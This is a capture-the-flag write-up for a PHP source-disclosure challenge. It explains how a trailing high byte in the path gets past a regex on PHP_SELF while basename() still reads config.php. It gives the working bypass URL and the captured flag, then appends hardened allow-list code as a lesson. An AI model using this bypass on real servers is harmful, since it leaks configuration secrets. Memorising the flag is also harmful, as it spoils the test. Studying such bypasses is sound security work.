Visit the page and click "source" to view the source code:
<?php
include 'config.php'; // FLAG is defined in config.php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if (hash_equals($secret, $guess)) {
        $message = 'Congratulations! The flag is: ' . FLAG;
    } else {
        $message = 'Wrong.';
    }
}
?>
First, we know the flag is in config.php, but the conditional that follows runs a regex over the request path.

$_SERVER['PHP_SELF'] returns the name of the currently executing script, including any trailing path info. For example, for http://k1ose2jo.com/index.php/example.php, $_SERVER['PHP_SELF'] returns /index.php/example.php.

Next comes the basename() function. basename() returns the file-name component of a path; for the URL above, basename($_SERVER['PHP_SELF']) returns example.php.

So to print the contents of config.php we would request /config.php?source, but that is exactly what the regex blocks, so it has to be bypassed. Note that the two checks read the same string differently: the regex /config\.php\/*$/i only rejects paths that end in config.php (optionally followed by slashes), while basename() decides which file is actually highlighted. Appending one more path component consisting of a single byte in the 128-255 range pollutes the end of the path: the regex no longer matches, yet basename() still resolves to config.php, because PHP's basename() is locale-aware and skips a trailing byte it cannot decode as a character instead of starting a new component (this is build- and locale-dependent, but it holds on the challenge server).

/index.php/config.php/%99?source

This returns the flag:

flag{50a4d60e-9823-42d9-b513-dec749a7ee94}
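As an added example (written for this page, not part of the writeup or the challenge), here is the challenge's check isolated into a function next to two hardened forms; the function names and the allow-list are my own. The point is that a deny-list regex over PHP_SELF and basename() disagree on the same string, so the file to display must never be derived from request data.

```php
<?php
// The challenge's logic, isolated for comparison. Returns the file name that
// highlight_file() would receive, or null if the regex rejected the path.
function challenge_target(string $phpSelf): ?string {
    if (preg_match('/config\.php\/*$/i', $phpSelf)) {
        return null;
    }
    return basename($phpSelf); // this, not the regex, decides which file is read
}

// Hardened form 1: the file to display is fixed in code, not taken from the request.
// For a "show my own source" feature this is all that is needed.
function hardened_target_self(): string {
    return __FILE__;
}

// Hardened form 2: if several files may be shown, compare the requested name
// strictly against an explicit allow-list. An exact-match allow-list cannot be
// bypassed by trailing path components, odd bytes or case tricks, because only
// the listed names pass; everything else is rejected.
function hardened_target_allowlist(string $phpSelf, array $allowed): ?string {
    $name = basename($phpSelf);
    return in_array($name, $allowed, true) ? $name : null;
}

// Constructed inputs: the normal request and the writeup's polluted path
// ("%99" in the URL decodes to the single byte 0x99).
$normal   = '/index.php/config.php';
$polluted = "/index.php/config.php/\x99";

// Compare what each version would hand to highlight_file(). On an affected
// PHP build/locale the two challenge_target() results differ (the second is
// not null), which is the mismatch the bypass relies on; both hardened forms
// refuse config.php regardless of how the path is decorated.
var_dump(challenge_target($normal));
var_dump(challenge_target($polluted));
var_dump(hardened_target_self());
var_dump(hardened_target_allowlist($polluted, ['index.php']));
```

Run it with `php example.php` on the command line; the behaviour of the polluted path depends on the PHP version and locale, which is why the hardened forms avoid relying on basename() at all for the decision.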